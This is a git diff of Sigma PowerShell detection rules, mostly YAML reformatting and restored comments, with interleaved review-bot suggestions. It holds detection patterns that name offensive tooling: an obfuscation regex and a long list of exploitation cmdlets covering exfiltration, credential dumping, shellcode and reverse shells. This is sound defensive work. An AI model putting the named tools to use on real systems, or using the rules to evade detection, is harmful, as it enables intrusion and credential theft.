--- a/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module id: f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6 related: - - id: e54f5149-6ba3-49cf-b153-070d24679126 - type: derived + - id: e54f5149-6ba3-49cf-b153-070d24679126 + type: derived status: test description: Detects Obfuscated Powershell via VAR++ LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27) author: Timur Zinniatullin, oscd.community date: 2020/10/13 modified: 2022/12/02 @@ -26,7 +26,7 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection_4103: - Payload|re: (?i).*&&set.*(\{\d\}){2,}\\"\s+?-f.*&&.*cmd.*/c + Payload|re: (?i).*&&set.*(\{\d\}){2,}\\"\s+?-f.*&&.*cmd.*/c # FPs with |\/r condition: ps_module and selection_4103 falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_malicious_commandlets.yml b/sigma/builtin/powershell/powershell_module/posh_pm_malicious_commandlets.yml index 23b5fcdab..51148f7e8 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_malicious_commandlets.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_malicious_commandlets.yml @@ -1,10 +1,10 @@ title: Malicious PowerShell Commandlets - PoshModule id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c related: - - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - type: similar - - id: 02030f2f-6199-49ec-b258-ea71b07e03dc - type: similar + - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 + type: similar + - id: 02030f2f-6199-49ec-b258-ea71b07e03dc + type: similar status: test description: Detects Commandlet names from well-known PowerShell exploitation frameworks references: 
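Review bot: The comment `# FPs with |\/r` appended to the selection_4103 regex is too terse to act on; it appears to mean that extending `cmd.*/c` to `cmd.*/(c|r)` (cmd /r is a synonym for /c) was tried and produced false positives, and if so the comment should say that outright, e.g. `# cmd /r (synonym for /c) is intentionally not matched, adding it caused false positives`. Unrelated to the change but visible in the same line, the leading `(?i).*` before `&&set` is redundant for an unanchored search and only adds backtracking on long payloads, so `(?i)&&set.*(\{\d\}){2,}\\"\s+?-f.*&&.*cmd.*/c` would match the same events.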
@@ -14,9 +14,9 @@ references: - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1 - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1 - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1 - - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ - - https://github.com/calebstewart/CVE-2021-1675 + - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec + - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec + - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1 - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html - https://github.com/HarmJ0y/DAMP @@ -52,6 +52,7 @@ detection: - PowerShellCore/Operational selection: Payload|contains: + # Note: Please ensure alphabetical order when adding new entries - Add-Exfiltration - Add-Persistence - Add-RegBackdoor 
@@ -67,16 +68,16 @@ detection: - Enable-MachineAccount - Enabled-DuplicateToken - Exploit-Jboss - - Export-ADR - - Export-ADRCSV - - Export-ADRExcel - - Export-ADRHTML - - Export-ADRJSON - - Export-ADRXML + - Export-ADR # # ADRecon related cmdlets + - Export-ADRCSV # # ADRecon related cmdlets + - Export-ADRExcel # # ADRecon related cmdlets + - Export-ADRHTML # # ADRecon related cmdlets + - Export-ADRJSON # # ADRecon related cmdlets + - Export-ADRXML # # ADRecon related cmdlets - Find-Fruit - Find-GPOLocation - Find-TrustedDocuments - - Get-ADIDNS + - Get-ADIDNS # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone - Get-ApplicationHost - Get-ChromeDump - Get-ClipboardContents @@ -118,7 +119,7 @@ detection: - Install-ServiceBinary - Install-SSP - Invoke-ACLScanner - - Invoke-ADRecon + - Invoke-ADRecon # # ADRecon related cmdlets - Invoke-ADSBackdoor - Invoke-AgentSmith - Invoke-AllChecks @@ -145,7 +146,7 @@ detection: - Invoke-Farmer - Invoke-Get-RBCD-Threaded - Invoke-Gopher - - Invoke-Grouper + - Invoke-Grouper # Also Covers Invoke-GrouperX - Invoke-HandleKatz - Invoke-ImpersonatedProcess - Invoke-ImpersonateSystem @@ -169,7 +170,7 @@ detection: - Invoke-P0wnedshell - Invoke-Paranoia - Invoke-PortScan - - Invoke-PoshRatHttp + - Invoke-PoshRatHttp # Also Covers Invoke-PoshRatHttps - Invoke-PostExfil - Invoke-PowerDump - Invoke-PowerShellTCP @@ -188,7 +189,7 @@ detection: - Invoke-Seatbelt - Invoke-ServiceAbuse - Invoke-ShadowSpray - - Invoke-Sharp + - Invoke-Sharp # Covers all "Invoke-Sharp" variants - Invoke-Shellcode - Invoke-SMBScanner - Invoke-Snaffler @@ -234,7 +235,7 @@ detection: - Remove-Update - Rename-ADIDNSNode - Revoke-ADIDNSPermission - - Set-ADIDNSNode + - Set-ADIDNSNode # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner - Set-MacAttribute - Set-MachineAccountAttribute - Set-Wallpaper 
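Review bot: In the `Payload|contains` list, `Export-ADR` already matches `Export-ADRCSV`, `Export-ADRExcel`, `Export-ADRHTML`, `Export-ADRJSON` and `Export-ADRXML` by substring, so the five more specific entries are redundant, while a few lines down the file takes the opposite approach and annotates a single `Get-ADIDNS` entry as covering its sub-cmdlets. Either drop the redundant entries or document why they are kept. The annotation `# # ADRecon related cmdlets` also carries a doubled hash; `# ADRecon related cmdlets` is enough, and the same doubled form appears on the `Invoke-ADRecon` entry in the following hunk.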
diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_remote_powershell_session.yml b/sigma/builtin/powershell/powershell_module/posh_pm_remote_powershell_session.yml
index 9e2f983d8..c4621e16c 100644
--- a/sigma/builtin/powershell/powershell_module/posh_pm_remote_powershell_session.yml
+++ b/sigma/builtin/powershell/powershell_module/posh_pm_remote_powershell_session.yml
@@ -24,8 +24,8 @@ detection:
 - PowerShellCore/Operational
 selection:
 ContextInfo|contains|all:
- - ' = ServerRemoteHost '
- - wsmprovhost.exe
+ - ' = ServerRemoteHost ' # HostName: 'ServerRemoteHost' french : Nom d’hôte =
+ - wsmprovhost.exe # HostApplication|contains: 'wsmprovhost.exe' french Application hôte =
 filter_pwsh_archive:
 ContextInfo|contains: \Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psm1
 condition: ps_module and (selection and not 1 of filter_*)
diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml b/sigma/builtin/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml
index 95ff09534..5421004ab 100644
--- a/sigma/builtin/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml
+++ b/sigma/builtin/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml
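Review bot: The comment restored on `' = ServerRemoteHost '` reads as two unjoined fragments (`HostName: 'ServerRemoteHost' french : Nom d’hôte =`) and never says what it is explaining, which appears to be that the key name is deliberately left out of the match so the rule fires on both English (`HostName = ServerRemoteHost`) and French (`Nom d’hôte = ServerRemoteHost`) event text. A one-liner stating that directly would help the next maintainer: `# key name omitted on purpose: matches "HostName = ServerRemoteHost" and the French "Nom d’hôte = ServerRemoteHost"`. The same applies to the `wsmprovhost.exe` comment on the following line.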
@@ -1,17 +1,14 @@ title: Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module id: 38a7625e-b2cb-485d-b83d-aff137d859f4 related: - - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 - type: similar - - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 - type: similar - - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 - type: similar + - id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 # ProcCreation + type: similar + - id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic + type: similar + - id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock + type: similar status: experimental -description: Detects PowerShell module creation where the module Contents are set - to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential - abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable - to module load-order hijacking. +description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 @@ -32,8 +29,7 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection: - Payload|contains: ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter - { + Payload|contains: ModuleContents=function Get-VMRemoteFXPhysicalVideoAdapter { condition: ps_module and selection falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml index 465e66863..c8ca4fe5f 100644 
--- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml @@ -1,15 +1,10 @@ title: AD Groups Or Users Enumeration Using PowerShell - PoshModule id: 815bfc17-7fc6-4908-a55e-2f37b98cedb4 status: test -description: 'Adversaries may attempt to find domain-level groups and permission settings. - - The knowledge of domain-level permission groups can help adversaries determine - which groups exist and which users belong to a particular group. - - Adversaries may use this information to determine which users have elevated permissions, - such as domain administrators. - - ' +description: | + Adversaries may attempt to find domain-level groups and permission settings. + The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. + Adversaries may use this information to determine which users have elevated permissions, such as domain administrators. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md author: frack113 
@@ -29,19 +24,19 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection_ad_principal: - - Payload|contains: get-ADPrincipalGroupMembership - - ContextInfo|contains: get-ADPrincipalGroupMembership + - Payload|contains: get-ADPrincipalGroupMembership + - ContextInfo|contains: get-ADPrincipalGroupMembership selection_get_aduser: - - Payload|contains|all: - - get-aduser - - '-f ' - - '-pr ' - - DoesNotRequirePreAuth - - ContextInfo|contains|all: - - get-aduser - - '-f ' - - '-pr ' - - DoesNotRequirePreAuth + - Payload|contains|all: + - get-aduser + - '-f ' + - '-pr ' + - DoesNotRequirePreAuth + - ContextInfo|contains|all: + - get-aduser + - '-f ' + - '-pr ' + - DoesNotRequirePreAuth condition: ps_module and (1 of selection_*) falsepositives: - Administrator script diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_download.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_download.yml index 981149c3e..6496e58fd 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_download.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_download.yml @@ -1,8 +1,8 @@ title: Suspicious PowerShell Download - PoshModule id: de41232e-12e8-49fa-86bc-c05c7e722df9 related: - - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 - type: derived + - id: 65531a81-a694-4e31-ae04-f8ba5bc33759 + type: derived status: test description: Detects suspicious PowerShell download command author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml index 9d04e9c67..2dae1dde9 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml 
@@ -1,9 +1,7 @@ title: Use Get-NetTCPConnection - PowerShell Module id: aff815cc-e400-4bf0-a47a-5d8a2407d4e1 status: test -description: Adversaries may attempt to get a listing of network connections to or - from the compromised system they are currently accessing or from remote systems - by querying for information over the network. +description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell author: frack113 diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_generic.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_generic.yml index 5922cabd9..bac07f52d 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_generic.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_generic.yml @@ -1,10 +1,10 @@ title: Suspicious PowerShell Invocations - Generic - PowerShell Module id: bbb80e91-5746-4fbe-8898-122e2cafdbf4 related: - - id: 3d304fda-78aa-43ed-975c-d740798a49c1 - type: derived - - id: ed965133-513f-41d9-a441-e38076a0798f - type: similar + - id: 3d304fda-78aa-43ed-975c-d740798a49c1 + type: derived + - id: ed965133-513f-41d9-a441-e38076a0798f + type: similar status: test description: Detects suspicious PowerShell invocation command parameters author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_specific.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_specific.yml index f95400b50..b95abf358 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_specific.yml 
+++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_invocation_specific.yml @@ -1,12 +1,12 @@ title: Suspicious PowerShell Invocations - Specific - PowerShell Module id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 related: - - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c - type: derived - - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 - type: similar - - id: 536e2947-3729-478c-9903-745aaffe60d2 - type: similar + - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c + type: derived + - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 + type: similar + - id: 536e2947-3729-478c-9903-745aaffe60d2 + type: similar status: test description: Detects suspicious PowerShell invocation command parameters author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_local_group_reco.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_local_group_reco.yml index a6f6062e3..0f07fd72a 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_local_group_reco.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_local_group_reco.yml 
@@ -1,15 +1,10 @@ title: Suspicious Get Local Groups Information id: cef24b90-dddc-4ae1-a09a-8764872f69fc status: test -description: 'Adversaries may attempt to find local system groups and permission settings. - - The knowledge of local system permission groups can help adversaries determine - which groups exist and which users belong to a particular group. - - Adversaries may use this information to determine which users have elevated permissions, - such as the users found within the local administrators group. - - ' +description: | + Adversaries may attempt to find local system groups and permission settings. + The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. + Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md author: frack113 @@ -29,19 +24,19 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational test_3: - - Payload|contains: - - get-localgroup - - Get-LocalGroupMember - - ContextInfo|contains: - - get-localgroup - - Get-LocalGroupMember + - Payload|contains: + - get-localgroup + - Get-LocalGroupMember + - ContextInfo|contains: + - get-localgroup + - Get-LocalGroupMember test_6: - - Payload|contains|all: - - Get-WMIObject - - Win32_Group - - ContextInfo|contains|all: - - Get-WMIObject - - Win32_Group + - Payload|contains|all: + - Get-WMIObject + - Win32_Group + - ContextInfo|contains|all: + - Get-WMIObject + - Win32_Group condition: ps_module and (1 of test_*) falsepositives: - Administrator script 
diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml index 66fb8bdc1..4701240b5 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml @@ -1,13 +1,9 @@ title: Suspicious Computer Machine Password by PowerShell id: e3818659-5016-4811-a73c-dde4679169d2 status: test -description: 'The Reset-ComputerMachinePassword cmdlet changes the computer account - password that the computers use to authenticate to the domain controllers in the - domain. - +description: | + The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain. You can use it to reset the password of the local computer. - - ' references: - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1 - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml index 1ad10cf95..87d77e636 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml 
@@ -1,16 +1,10 @@ title: Suspicious Get Information for SMB Share - PowerShell Module id: 6942bd25-5970-40ab-af49-944247103358 status: test -description: 'Adversaries may look for folders and drives shared on remote systems - as a means of identifying sources of information to gather as a precursor for - Collection and - +description: | + Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. - - Networks often contain shared network drives and folders that enable users to - access file directories on various systems across a network. - - ' + Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md author: frack113 @@ -30,8 +24,8 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection: - - Payload|contains: get-smbshare - - ContextInfo|contains: get-smbshare + - Payload|contains: get-smbshare + - ContextInfo|contains: get-smbshare condition: ps_module and selection falsepositives: - Administrator script diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_susp_zip_compress.yml b/sigma/builtin/powershell/powershell_module/posh_pm_susp_zip_compress.yml index 6516ab856..2e0755f0c 100644 --- a/sigma/builtin/powershell/powershell_module/posh_pm_susp_zip_compress.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_susp_zip_compress.yml 
@@ -1,22 +1,16 @@ title: Zip A Folder With PowerShell For Staging In Temp - PowerShell Module -id: daf7eb81-35fd-410d-9d7a-657837e602bb +id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module related: - - id: 71ff406e-b633-4989-96ec-bc49d825a412 - type: similar - - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 - type: similar - - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 - type: similar + - id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic + type: similar + - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script + type: similar + - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation + type: similar status: test -description: 'Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet - in order to compress folders and files where the output is stored in a potentially - suspicious location that is used often by malware for exfiltration. - - An adversary might compress data (e.g., sensitive documents) that is collected - prior to exfiltration in order to make it portable and minimize the amount of - data sent over the network. - - ' +description: | + Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. + An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a diff --git a/sigma/builtin/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml b/sigma/builtin/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml index c9f461c8c..de0726ff2 100644 
--- a/sigma/builtin/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml +++ b/sigma/builtin/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml @@ -1,16 +1,15 @@ title: SyncAppvPublishingServer Bypass Powershell Restriction - PS Module id: fe5ce7eb-dad8-467c-84a9-31ec23bd644a related: - - id: fde7929d-8beb-4a4c-b922-be9974671667 - type: derived - - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 - type: derived + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: derived + - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 + type: derived status: test -description: Detects SyncAppvPublishingServer process execution which usually utilized - by adversaries to bypass PowerShell execution restrictions. +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ -author: "Ensar \u015Eamil, @sblmsrsn, OSCD Community" +author: Ensar Şamil, @sblmsrsn, OSCD Community date: 2020/10/05 modified: 2022/12/02 tags: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml b/sigma/builtin/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml index 62d7ba826..d60a653b3 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml 
@@ -1,12 +1,10 @@ title: AADInternals PowerShell Cmdlets Execution - PsScript id: 91e69562-2426-42ce-a647-711b8152ced6 related: - - id: c86500e9-a645-4680-98d7-f882c70c1ea3 - type: similar + - id: c86500e9-a645-4680-98d7-f882c70c1ea3 + type: similar status: test -description: Detects ADDInternals Cmdlet execution. A tool for administering Azure - AD and Office 365. Which can be abused by threat actors to attack Azure AD or - Office 365. +description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. references: - https://o365blog.com/aadinternals/ - https://github.com/Gerenios/AADInternals @@ -30,6 +28,7 @@ detection: - PowerShellCore/Operational selection: ScriptBlockText|contains: + # Since most of the cmdlets use a unique enough string which is "-AADInt" we only used that portion. For a complete list please check the references linked above - Add-AADInt - ConvertTo-AADInt - Disable-AADInt diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml b/sigma/builtin/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml index cdd08b207..d242d2ce7 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml 
@@ -1,21 +1,15 @@ title: Access to Browser Login Data id: fc028194-969d-4122-8abe-0470d5b8f12f related: - - id: 98f4c75c-3089-44f3-b733-b327b9cd9c9d - type: obsoletes - - id: 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b - type: similar + - id: 98f4c75c-3089-44f3-b733-b327b9cd9c9d + type: obsoletes + - id: 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b + type: similar status: test -description: 'Adversaries may acquire credentials from web browsers by reading files - specific to the target browser. - - Web browsers commonly save credentials such as website usernames and passwords - so that they do not need to be entered manually in the future. - - Web browsers typically store the credentials in an encrypted format within a credential - store. - - ' +description: | + Adversaries may acquire credentials from web browsers by reading files specific to the target browser. + Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. + Web browsers typically store the credentials in an encrypted format within a credential store. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml b/sigma/builtin/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml index 887586583..5b7743689 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml 
@@ -1,13 +1,12 @@ title: Potential Active Directory Enumeration Using AD Module - PsScript id: 9e620995-f2d8-4630-8430-4afd89f77604 related: - - id: 70bc5215-526f-4477-963c-a47a5c9ebd12 - type: similar - - id: 74176142-4684-4d8a-8b0a-713257e7df8e - type: similar + - id: 70bc5215-526f-4477-963c-a47a5c9ebd12 + type: similar + - id: 74176142-4684-4d8a-8b0a-713257e7df8e + type: similar status: test -description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" - DLL. Which is often used by attackers to perform AD enumeration. +description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. references: - https://github.com/samratashok/ADModule - https://twitter.com/cyb3rops/status/1617108657166061568?s=20 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml b/sigma/builtin/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml index 64ae7f308..8179b3f66 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml @@ -1,13 +1,9 @@ title: Powershell Add Name Resolution Policy Table Rule id: 4368354e-1797-463c-bc39-a309effbe8d7 status: test -description: 'Detects powershell scripts that adds a Name Resolution Policy Table - (NRPT) rule for the specified namespace. - - This will bypass the default DNS server and uses a specified server for answering - the query. - - ' +description: | + Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. + This will bypass the default DNS server and uses a specified server for answering the query. references: - https://twitter.com/NathanMcNulty/status/1569497348841287681 - https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps 
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_add_windows_capability.yml b/sigma/builtin/powershell/powershell_script/posh_ps_add_windows_capability.yml index 1a7519fe0..23d964943 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_add_windows_capability.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_add_windows_capability.yml @@ -1,11 +1,10 @@ title: Add Windows Capability Via PowerShell Script id: 155c7fd5-47b4-49b2-bbeb-eb4fab335429 related: - - id: b36d01a3-ddaf-4804-be18-18a6247adfcd - type: similar + - id: b36d01a3-ddaf-4804-be18-18a6247adfcd + type: similar status: experimental -description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. - Notable capabilities could be "OpenSSH" and others. +description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. references: - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell - https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content @@ -27,10 +26,9 @@ detection: selection_cmdlet: ScriptBlockText|contains: 'Add-WindowsCapability ' selection_capa: - ScriptBlockText|contains: -Name OpenSSH. + ScriptBlockText|contains: -Name OpenSSH. # For both "OpenSSH.Server" and "OpenSSH.Client" condition: ps_script and (all of selection_*) falsepositives: - - Legitimate usage of the capabilities by administrators or users. Add additional - filters accordingly. + - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_adrecon_execution.yml b/sigma/builtin/powershell/powershell_script/posh_ps_adrecon_execution.yml index 83f799e2c..c3b02a030 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_adrecon_execution.yml 
